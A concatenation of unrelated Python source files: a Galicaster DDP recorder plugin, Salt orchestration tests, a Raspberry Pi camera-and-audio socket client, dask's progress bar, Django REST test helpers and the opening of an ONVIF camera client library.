dispatcher.connect('recorder-vumeter', self.vumeter)
dispatcher.connect('timer-short', self.update_vu)
dispatcher.connect('timer-short', self.heartbeat)
dispatcher.connect('recorder-started', self.on_start_recording)
dispatcher.connect('recorder-stopped', self.on_stop_recording)
dispatcher.connect('recorder-status', self.on_rec_status_update)
def run(self):
self.connect()
def connect(self):
if not self.has_disconnected:
try:
self.client.connect()
except Exception:
logger.warn('DDP connection failed')
def update(self, collection, query, update):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.update(
collection,
query,
update,
callback=self.update_callback)
except Exception:
logger.warn(
"Error updating document "
"{collection: %s, query: %s, update: %s}" %
(collection, query, update))
def insert(self, collection, document):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.insert(
collection,
document,
callback=self.insert_callback)
except Exception:
logger.warn(
"Error inserting document {collection: %s, document: %s}" %
(collection, document))
def heartbeat(self, element):
if self.client.connected:
self.update_images()
else:
self.connect()
def on_start_recording(self, sender, id):
self.recording = True
self.currentMediaPackage = self.media_package_metadata(id)
self.currentProfile = conf.get_current_profile().name
self.update(
'rooms', {
'_id': self.id
}, {
'$set': {
'currentMediaPackage': self.currentMediaPackage,
'currentProfile': self.currentProfile,
'recording': self.recording
}
})
def on_stop_recording(self, mpid, sender=None):
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.update(
'rooms', {
'_id': self.id
}, {
'$unset': {
'currentMediaPackage': '',
'currentProfile': ''
}, '$set': {
'recording': self.recording
}
})
self.update_images(1.5)
def on_init(self, data):
self.update_images(1.5)
def update_images(self, delay=0.0):
worker = Thread(target=self._update_images, args=(delay,))
worker.start()
def _update_images(self, delay):
time.sleep(delay)
files = {}
if not self.screenshot_file:
# take a screenshot with pyscreenshot
im = ImageGrab.grab(bbox=(0, 0, self._screen_width, self._screen_height), backend='imagemagick')
else:
try:
# used if screenshot already exists
im = Image.open(self.screenshot_file)
except IOError as e:
logger.warn("Unable to open screenshot file {0}".format(self.screenshot_file))
return
output = cStringIO.StringIO()
image_format = 'JPEG'
if not self.high_quality:
im.thumbnail((640, 360), Image.ANTIALIAS)
else:
image_format = 'PNG'
if im.mode != "RGB":
im = im.convert("RGB")
im.save(output, format=image_format) # to reduce jpeg size use param: optimize=True
files['galicaster'] = ('galicaster.jpg', output.getvalue(),
'image/jpeg')
try:
# add verify=False for testing self signed certs
requests.post(
"%s/image/%s" %
(self._http_host, self.id), files=files, auth=(
self._user, self._password)) # to ignore ssl verification, use param: verify=False
except Exception:
logger.warn('Unable to post images')
def vumeter(self, element, data, data_chan2, vu_bool):
if data == "Inf":
data = 0
else:
if data < -self.vu_range:
data = -self.vu_range
elif data > 0:
data = 0
self.vu_data = int(((data + self.vu_range) / float(self.vu_range)) * 100)
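        # Worked example of the mapping above, assuming the default vu_range of 50:
        # -50 dB -> 0 %, -25 dB -> 50 %, 0 dB -> 100 %.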
def update_vu(self, element):
if self.vu_data != self.last_vu:
update = {'vumeter': self.vu_data}
self.update('rooms', {'_id': self.id}, {'$set': update})
self.last_vu = self.vu_data
def on_rec_status_update(self, element, data):
if data == 'paused':
is_paused = True
else:
is_paused = False
if is_paused:
self.update_images(.75)
if self.paused == is_paused:
self.update(
'rooms', {
'_id': self.id}, {
'$set': {
'paused': is_paused}})
self.paused = is_paused
if data == 'recording':
self.update_images(.75)
def media_package_metadata(self, id):
mp = context.get('recorder').current_mediapackage
line = mp.metadata_episode
duration = mp.getDuration()
line["duration"] = long(duration / 1000) if duration else None
# FIXME Does series_title need sanitising as well as duration?
created = mp.getDate()
# line["created"] = calendar.timegm(created.utctimetuple())
for key, value in mp.metadata_series.iteritems():
line["series_" + key] = value
for key, value in line.iteritems():
if value in [None, []]:
line[key] = ''
# return line
return line
def subscription_callback(self, error):
if error:
logger.warn("Subscription callback returned error: %s" % error)
def insert_callback(self, error, data):
if error:
logger.warn("Insert callback returned error: %s" % error)
def update_callback(self, error, data):
if error:
logger.warn("Update callback returned error: %s" % error)
def on_subscribed(self, subscription):
        if subscription == 'GalicasterControl':
me = self.client.find_one('rooms')
# Data to push when inserting or updating
data = {
'displayName': self.displayName,
'ip': self.ip,
'paused': self.paused,
'recording': self.recording,
'heartbeat': int(time.time()),
'camAvailable': self.cam_available,
'inputs': self.inputs(),
'stream': {
'host': self._stream_host,
'port': self._audiostream_port,
'key': self.stream_key
}
}
# Parse extra Meteor Mongodb collection elements and append
for params in self.extra_params_list:
param = params.split(':')
data[param[0]] = param[1]
if self.currentMediaPackage:
data['currentMediaPackage'] = self.currentMediaPackage
if self.currentProfile:
data['currentProfile'] = self.currentProfile
if me:
# Items to unset
unset = {}
if not self.currentMediaPackage:
unset['currentMediaPackage'] = ''
if not self.currentProfile:
unset['currentProfile'] = ''
# Update to push
update = {
'$set': data
}
if unset:
update['$unset'] = unset
self.update('rooms', {'_id': self.id}, update)
else:
data['_id'] = self.id
self.insert('rooms', data)
def inputs(self):
inputs = {
'presentations': ['Presentation']
}
inputs['cameras'] = []
labels = conf.get('ddp', 'cam_labels')
cam_labels = []
if labels:
cam_labels = [l.strip() for l in labels.split(',')]
for i in range(0, self.cam_available):
label = cam_labels[i] if i < len(
cam_labels) else "Camera %d" % (i + 1)
inputs['cameras'].append(label)
return inputs
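    # Illustrative return value, assuming cam_available == 2 and cam_labels == 'Left, Right' in the config:
    #   {'presentations': ['Presentation'], 'cameras': ['Left', 'Right']}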
def on_added(self, collection, id, fields):
pass
def on_changed(self, collection, id, fields, cleared):
me = self.client.find_one('rooms')
if self.paused != me['paused']:
self.set_paused(me['paused'])
if context.get('recorder').is_recording() != me['recording']:
self.set_recording(me)
def on_removed(self, collection, id):
self.on_subscribed(None)
def set_paused(self, new_status):
if not self.paused:
self.paused = new_status
context.get('recorder').pause()
else:
self.paused = False
context.get('recorder').resume()
def set_recording(self, me):
self.recording = me['recording']
if self.recording:
# FIXME: Metadata isn't passed to recorder
meta = me.get('currentMediaPackage', {}) or {}
profile = me.get('currentProfile', 'nocam')
series = (meta.get('series_title', ''), meta.get('isPartOf', ''))
user = {'user_name': meta.get('creator', ''),
'user_id': meta.get('rightsHolder', '')}
title = meta.get('title', 'Unknown')
context.get('recorder').record()
else:
context.get('recorder').stop()
def on_connected(self):
logger.info('Connected to Meteor')
token = conf.get('ddp', 'token')
self.client.login(self._user, self._password, token=token)
def on_logged_in(self, data):
conf.set('ddp', 'token', data['token'])
conf.update()
try:
self.client.subscribe(
'GalicasterControl',
params=[
self.id],
callback=self.subscription_callback)
except Exception:
logger.warn('DDP subscription failed')
def on_closed(self, code, reason):
self.has_disconnected = True
logger.error('Disconnected from Meteor: err %d - %s' % (code, reason))
def subscribedTo(self, publication):
        return self.client.subscriptions.get(publication) is not None
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import yaml
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
# Import Salt Libs
import salt.utils
import salt.utils.platform
import salt.utils.event
import salt.utils.files
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
        and not the full stateful return. This test ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, str(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(yaml.dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date:
cmd.run
'''))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
cognoclient.py
|
import cv2
import socket
import time
import pyaudio
from playsound import playsound
import wave
import uuid
from collections import deque
import os
import threading
import RPi.GPIO as GPIO
class AudioBuffer():
def __init__(self, dbpath, seconds=3):
"""
An audiobuffer that keeps the last few seconds of audio in memory
Parameters
----------
dbpath : String
The path to the audiobase.
seconds : float or int
            The amount of audio, in seconds, to keep in memory
Returns
-------
NoneType
None
"""
self.dbpath = dbpath
self.CHUNK = 2048
self.FORMAT = pyaudio.paInt16
self.CHANNELS = 1
self.RATE = 44100
self.RECORD_SECONDS = seconds
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK, input_device_index=1)
self.frames = deque()
try:
for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):
data = self.stream.read(self.CHUNK)
self.frames.append(data)
except:
pass
self.AudioThread = threading.Thread(target=self._read_loop, args=())
self.AudioThread.start()
def read(self):
"""
        Reads the next chunk of audio, appends it to the buffer, and drops the oldest chunk so only the last few seconds are kept
Returns
-------
NoneType
None
"""
data = self.stream.read(self.CHUNK)
self.frames.append(data)
self.frames.popleft()
def _read_loop(self):
"""
Loops the read function
Returns
-------
NoneType
None
"""
while True:
self.read()
def get(self):
"""
Gets the last few seconds of the audiobuffer
Returns
-------
deque
A deque with raw audio data from PyAudio
"""
return self.frames
def close(self):
"""
Closes the pyaudio stream and stops recording
Returns
-------
NoneType
None
"""
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
def save(self, name):
"""
        Saves the buffered audio to a .wav file inside a folder named `name` under the audiobase
Parameters
----------
name : str
Name to save the folder under in the audiobase
Returns
-------
NoneType
None
"""
try:
os.mkdir(os.path.join(self.dbpath, name))
except:
pass
wf = wave.open(os.path.join(self.dbpath, name, str(uuid.uuid4()) + ".wav"), 'wb')
wf.setnchannels(self.CHANNELS)
wf.setsampwidth(self.p.get_sample_size(self.FORMAT))
wf.setframerate(self.RATE)
wf.writeframes(b''.join(list(self.frames)))
wf.close()
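# Usage sketch for AudioBuffer (paths and the id are illustrative): keep a rolling ~3 s buffer in a
# background thread and snapshot it on demand.
#   buf = AudioBuffer('Data/audiobase', seconds=3)
#   buf.save('some-recording-id')   # writes the last few seconds to Data/audiobase/some-recording-id/<uuid>.wav
#   buf.close()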
# Global variable specifically for server connection
client_socket = None
def connect_server():
    global client_socket
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('192.168.1.5', 8485))
# Global variables used specifically for GPIO callback
GPIO_action = None
last_press = 0
def GPIO_callback(channel):
global GPIO_action, last_press
press_time = round(time.time() * 1000)
press_diff = press_time - last_press
last_press = press_time
GPIO_action = 'double' if press_diff < 250 else 'single'
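# e.g. two presses ~180 ms apart: the second callback sees press_diff < 250 and sets GPIO_action to
# 'double'; a lone press (or one arriving more than 250 ms after the previous) yields 'single'.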
if __name__ == '__main__':
    # Connect to the server over a plain TCP socket
connect_server()
camera = cv2.VideoCapture(0)
# Initialize audio buffer
audio_buffer = AudioBuffer('Data/audiobase')
    # Use BCM (Broadcom SoC channel) numbering for the GPIO pins
GPIO.setmode(GPIO.BCM)
# Setup pin 4 to accept GPIO input from touch sensor
GPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Add event listener for touch sensor GPIO pin
GPIO.add_event_detect(4, GPIO.BOTH, GPIO_callback)
# Throw main thread into action loop
while True:
ms_since_last_press = round(time.time() * 1000) - last_press
if GPIO_action and ms_since_last_press > 200:
print(GPIO_action + ' press.')
if GPIO_action == 'double':
# Create new UUID and save audio file under that name
id = str(uuid.uuid4())
audio_buffer.save(id)
# Read single camera frame
_, img = camera.read()
img = cv2.imencode('.jpg', img).tobytes()
# Send the image along with its length
client_socket.send(len(img).to_bytes(4, 'little'))
client_socket.send(img)
# Send the UUID along with its length
client_socket.send(len(id).to_bytes(4, 'little'))
                client_socket.send(id.encode('utf-8'))
elif GPIO_action == 'single':
# Capture a frame and encode it in JPEG
_, img = camera.read()
img = cv2.imencode('.jpg', img).tobytes()
# Send the image across the socket with its size
client_socket.send(len(img).to_bytes(4, 'little'))
client_socket.send(img)
# Read UUID from server
                id_len = int.from_bytes(client_socket.recv(4), 'little')
                id = client_socket.recv(id_len).decode('utf-8')
# Play sound from saved wav file
playsound(id + '.wav')
GPIO_action = None
|
progress.py
|
import sys
import threading
import time
from timeit import default_timer
from ..callbacks import Callback
from ..utils import ignoring
def format_time(t):
"""Format seconds into a human readable form.
>>> format_time(10.4)
'10.4s'
>>> format_time(1000.4)
'16min 40.4s'
"""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
if h:
return "{0:2.0f}hr {1:2.0f}min {2:4.1f}s".format(h, m, s)
elif m:
return "{0:2.0f}min {1:4.1f}s".format(m, s)
else:
return "{0:4.1f}s".format(s)
class ProgressBar(Callback):
"""A progress bar for dask.
Parameters
----------
minimum : int, optional
Minimum time threshold in seconds before displaying a progress bar.
Default is 0 (always display)
width : int, optional
Width of the bar
dt : float, optional
Update resolution in seconds, default is 0.1 seconds
Examples
--------
Below we create a progress bar with a minimum threshold of 1 second before
displaying. For cheap computations nothing is shown:
>>> with ProgressBar(minimum=1.0): # doctest: +SKIP
... out = some_fast_computation.compute()
But for expensive computations a full progress bar is displayed:
>>> with ProgressBar(minimum=1.0): # doctest: +SKIP
... out = some_slow_computation.compute()
[########################################] | 100% Completed | 10.4 s
The duration of the last computation is available as an attribute
>>> pbar = ProgressBar() # doctest: +SKIP
>>> with pbar: # doctest: +SKIP
... out = some_computation.compute()
[########################################] | 100% Completed | 10.4 s
>>> pbar.last_duration # doctest: +SKIP
10.4
You can also register a progress bar so that it displays for all
computations:
>>> pbar = ProgressBar() # doctest: +SKIP
>>> pbar.register() # doctest: +SKIP
>>> some_slow_computation.compute() # doctest: +SKIP
[########################################] | 100% Completed | 10.4 s
"""
def __init__(self, minimum=0, width=40, dt=0.1, out=None):
if out is None:
out = sys.stdout
self._minimum = minimum
self._width = width
self._dt = dt
self._file = out
self.last_duration = 0
def _start(self, dsk):
self._state = None
self._start_time = default_timer()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
def _pretask(self, key, dsk, state):
self._state = state
self._file.flush()
def _finish(self, dsk, state, errored):
self._running = False
self._timer.join()
elapsed = default_timer() - self._start_time
self.last_duration = elapsed
if elapsed < self._minimum:
return
if not errored:
self._draw_bar(1, elapsed)
else:
self._update_bar(elapsed)
self._file.write("\n")
self._file.flush()
def _timer_func(self):
"""Background thread for updating the progress bar"""
while self._running:
elapsed = default_timer() - self._start_time
if elapsed > self._minimum:
self._update_bar(elapsed)
time.sleep(self._dt)
def _update_bar(self, elapsed):
s = self._state
if not s:
self._draw_bar(0, elapsed)
return
ndone = len(s["finished"])
ntasks = sum(len(s[k]) for k in ["ready", "waiting", "running"]) + ndone
if ndone < ntasks:
self._draw_bar(ndone / ntasks if ntasks else 0, elapsed)
def _draw_bar(self, frac, elapsed):
bar = "#" * int(self._width * frac)
percent = int(100 * frac)
elapsed = format_time(elapsed)
msg = "\r[{0:<{1}}] | {2}% Completed | {3}".format(
bar, self._width, percent, elapsed
)
with ignoring(ValueError):
self._file.write(msg)
self._file.flush()
|
test_helpers.py
|
import json
import threading
import time
from django.db import connection
from django.test import Client
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from bullet_point.models import BulletPoint
from discussion.models import Thread
from hub.models import Hub
from paper.models import Paper, Vote
from user.models import Author, University, User
class TestData:
first_name = 'Regulus'
last_name = 'Black'
author_first_name = 'R. A.'
author_last_name = 'Black'
invalid_email = 'testuser@gmail'
invalid_password = 'pass'
valid_email = 'testuser@gmail.com'
valid_password = 'ReHub940'
university_name = 'Hogwarts'
university_country = 'England'
university_state = 'London'
university_city = 'London'
paper_title = ('Messrs Moony, Wormtail, Padfoot, and Prongs Purveyors of'
' Aids to Magical Mischief-Makers are proud to present THE'
' MARAUDER\'S MAP'
)
paper_titles = [
'Engendering Extroverted Murder: Hamlet Revenge and/in the Oppressed',
'Freedom Of Speech',
'How Films Relate To Criminology',
'Constructing Reliable Vision',
'Self-Organization of Associative Database and Its Applications',
'Family Discovery',
'Learning the Structure of Similarity',
'Forward-backward retraining of recurrent neural networks',
'Stable Dynamic Parameter Adaption',
'Improving Elevator Performance Using Reinforcement Learning',
'Softassign versus Softmax: Benchmarks in Combinatorial Optimization',
]
paper_publish_date = '1990-10-01'
# REFACTOR: Instead of having to inherit this class, test cases should import
# the needed functions from a test_helper module that is defined in each app.
class TestHelper:
test_data = TestData()
def create_user(
self,
first_name=test_data.first_name,
last_name=test_data.last_name,
email=test_data.valid_email,
password=test_data.valid_password
):
return User.objects.create(
first_name=first_name,
last_name=last_name,
email=email,
password=password
)
def create_random_authenticated_user(self, unique_value):
user = self.create_random_default_user(unique_value)
Token.objects.create(user=user)
return user
def create_random_default_user(self, unique_value):
first_name = self.test_data.first_name + str(unique_value)
last_name = self.test_data.last_name + str(unique_value)
email = str(unique_value) + self.test_data.valid_email
user = self.create_user(
first_name=first_name,
last_name=last_name,
email=email
)
return user
def create_author(
self,
user,
university,
first_name=test_data.author_first_name,
last_name=test_data.author_last_name
):
return Author.objects.create(
user=user,
first_name=first_name,
last_name=last_name,
university=university
)
def create_author_without_user(
self,
university,
first_name=test_data.author_first_name,
last_name=test_data.author_last_name
):
return Author.objects.create(
first_name=first_name,
last_name=last_name,
university=university
)
def create_university(
self,
name=test_data.university_name,
country=test_data.university_country,
state=test_data.university_state,
city=test_data.university_city
):
return University.objects.create(
name=name,
country=country,
state=state,
city=city
)
def create_paper_without_authors(
self,
title=test_data.paper_title
):
return Paper.objects.create(
title=title,
paper_publish_date=self.test_data.paper_publish_date
)
def create_hub(
self,
name
):
return Hub.objects.create(
name=name
)
def create_upvote(
self,
user,
paper
):
return Vote.objects.create(
paper=paper,
created_by=user,
vote_type=Vote.UPVOTE
)
def create_downvote(
self,
user,
paper
):
return Vote.objects.create(
paper=paper,
created_by=user,
vote_type=Vote.DOWNVOTE
)
def create_thread(
self,
user,
paper,
text='thread'
):
return Thread.objects.create(
created_by=user,
paper=paper,
text={'text': text},
plain_text=text
)
def create_bulletpoint(
self,
user,
paper,
text='bulletpoint'
):
return BulletPoint.objects.create(
created_by=user,
paper=paper,
plain_text=text
)
class IntegrationTestHelper(TestData):
client = Client()
def get_default_authenticated_client(self):
response = self.signup_default_user()
response_content = self.bytes_to_json(response.content)
token = response_content.get('key')
client = self._create_authenticated_client(token)
return client
def signup_default_user(self):
url = '/auth/signup/'
body = {
"username": self.valid_email,
"email": self.valid_email,
"password1": self.valid_password,
"password2": self.valid_password
}
return self.get_post_response(url, body)
def bytes_to_json(self, data_bytes):
data_string = data_bytes.decode('utf-8')
json_dict = json.loads(data_string)
return json_dict
def get_get_response(
self,
path,
query_data=None,
follow_redirects=True,
client=client
):
"""
Returns the response of a `GET` request made by `client`.
query_data {'param1': ['value1', 'value2'], 'param2': ['value3']}
"""
return client.get(
path,
data=query_data,
follow=follow_redirects,
content_type='application/json'
)
def get_post_response(
self,
path,
data,
client=client,
content_type='application/json',
follow_redirects=True
):
return client.post(
path,
data=json.dumps(data),
follow=follow_redirects,
content_type=content_type
)
def get_authenticated_get_response(
self,
user,
url,
content_type
):
csrf = False
if content_type == 'application/json':
content_format = 'json'
elif content_type == 'multipart/form-data':
content_format = 'multipart'
csrf = True
client = APIClient(enforce_csrf_checks=csrf)
client.force_authenticate(user=user, token=user.auth_token)
response = client.get(url, format=content_format)
return response
def _create_authenticated_client(self, auth_token):
return Client(HTTP_AUTHORIZATION=f'Token {auth_token}')
def bytes_to_json(data_bytes):
"""Returns `json_dict` representation of `data_bytes`."""
data_string = data_bytes.decode('utf-8')
json_dict = json.loads(data_string)
return json_dict
def get_authenticated_get_response(
user,
url,
content_type='application/json'
):
'''
Sends a get request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.get(url, format=content_format)
return response
def get_get_response(
path,
query_data=None,
follow_redirects=True,
csrf=False,
http_origin=None
):
"""
Returns the response of a `GET` request made by an `APIClient`.
query_data {'param1': ['value1', 'value2'], 'param2': ['value3']}
"""
client = APIClient(enforce_csrf_checks=csrf, HTTP_ORIGIN=http_origin)
return client.get(
path,
data=query_data,
follow=follow_redirects,
content_type='application/json'
)
def get_authenticated_post_response(
user,
url,
data,
content_type='application/json',
follow=False,
headers=None
):
'''
Sends a post request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type,
http_origin=headers and headers.get('HTTP_ORIGIN', None)
)
response = client.post(url, data, format=content_format, follow=follow)
return response
def get_authenticated_patch_response(
user,
url,
data,
content_type
):
'''
Sends a patch request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.patch(url, data, format=content_format)
return response
def get_authenticated_put_response(
user,
url,
data,
content_type
):
'''
Sends a put request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.put(url, data, format=content_format)
return response
def get_authenticated_delete_response(
user,
url,
data,
content_type
):
'''
Sends a delete request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.delete(url, data, format=content_format)
return response
def _get_authenticated_client_config(
user,
url,
content_type,
http_origin=None
):
csrf = False
if content_type == 'multipart/form-data':
content_format = 'multipart'
csrf = True
elif content_type == 'plain/text':
content_format = 'txt'
else:
content_format = 'json'
client = APIClient(enforce_csrf_checks=csrf, HTTP_ORIGIN=http_origin)
client.force_authenticate(user=user, token=user.auth_token)
return client, content_format
def get_user_from_response(response):
return response.wsgi_request.user
class DatabaseThread(threading.Thread):
def run(self):
super().run()
connection.close()
# Copied from
# https://www.caktusgroup.com/blog/2009/05/26/testing-django-views-for-concurrency-issues/
def test_concurrently(runs, delay=None):
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def test_concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
def call_test_func():
try:
test_func(*args, **kwargs)
except Exception as e:
exceptions.append(e)
raise
threads = []
for i in range(runs):
threads.append(DatabaseThread(target=call_test_func))
for t in threads:
if delay is not None:
time.sleep(delay)
t.start()
for t in threads:
if delay is not None:
time.sleep(delay)
t.join()
if exceptions:
raise Exception(
'test_concurrently intercepted %s exceptions: %s'
% (len(exceptions), exceptions)
)
return wrapper
return test_concurrently_decorator
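# Illustrative usage sketch (not part of the original suite): the decorated
# function and its body below are assumptions made for the example only.
#
#   @test_concurrently(runs=5, delay=0.1)
#   def hit_vote_endpoint():
#       get_authenticated_post_response(user, url, data)
#
#   hit_vote_endpoint()  # runs the body in 5 DatabaseThreads and re-raises any failure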
|
client.py
|
__version__ = '0.0.1'
import os.path
import re
import urlparse
import urllib
from threading import Thread, RLock
import logging
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('suds.client').setLevel(logging.CRITICAL)
import suds.sudsobject
from suds.client import Client
from suds.wsse import Security, UsernameToken
from suds.cache import ObjectCache, NoCache
from suds_passworddigest.token import UsernameDigestToken
from suds.bindings import binding
binding.envns = ('SOAP-ENV', 'http://www.w3.org/2003/05/soap-envelope')
from onvif.exceptions import ONVIFError
from definition import SERVICES, NSMAP
from suds.sax.date import UTC
import datetime as dt
# Ensure methods raise an ONVIFError exception
# when something goes wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameDigestToken):
'''
UsernameDigestToken class with an adjustable time offset parameter;
this allows authentication on cameras that are not time synchronized.
Please note that using NTP on both ends is the recommended solution;
this should only be used in "safe" environments.
'''
def __init__(self, user, passw, dt_diff=None) :
# Old Style class ... sigh ...
UsernameDigestToken.__init__(self, user, passw)
self.dt_diff = dt_diff
def setcreated(self, *args, **kwargs):
dt_adjusted = None
if self.dt_diff :
dt_adjusted = (self.dt_diff + dt.datetime.utcnow())
UsernameToken.setcreated(self, dt=dt_adjusted, *args, **kwargs)
self.created = str(UTC(self.created))
class ONVIFService(object):
'''
Python implementation of an ONVIF service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameters to service methods:
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
'''
@safe_func
def __init__(self, xaddr, user, passwd, url,
cache_location='/tmp/suds', cache_duration=None,
encrypt=True, daemon=False, ws_client=None, no_cache=False,
portType=None, dt_diff = None, timeout=None):
if not os.path.isfile(url):
raise ONVIFError('%s does not exist!' % url)
if no_cache:
cache = NoCache()
else:
# Create cache object
# NOTE: if cache_location is specified,
# onvif must have permission to access it.
cache = ObjectCache(location=cache_location)
# cache_duration: cache will expire in `cache_duration` days
if cache_duration is not None:
cache.setduration(days=cache_duration)
# Convert pathname to url
self.url = urlparse.urljoin('file:', urllib.pathname2url(url))
self.xaddr = xaddr
soap_kwargs = {}
if timeout:
soap_kwargs['timeout'] = timeout
# Create soap client
if not ws_client:
self.ws_client = Client(url=self.url,
location=self.xaddr,
cache=cache,
port=portType,
headers={'Content-Type': 'application/soap+xml'},
**soap_kwargs)
else:
self.ws_client = ws_client
self.ws_client.set_options(location=self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicates whether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
if self.user is not None and self.passwd is not None:
self.set_wsse()
# Method to create type instance of service method defined in WSDL
self.create_type = self.ws_client.factory.create
@safe_func
def set_wsse(self, user=None, passwd=None):
''' Basic ws-security auth '''
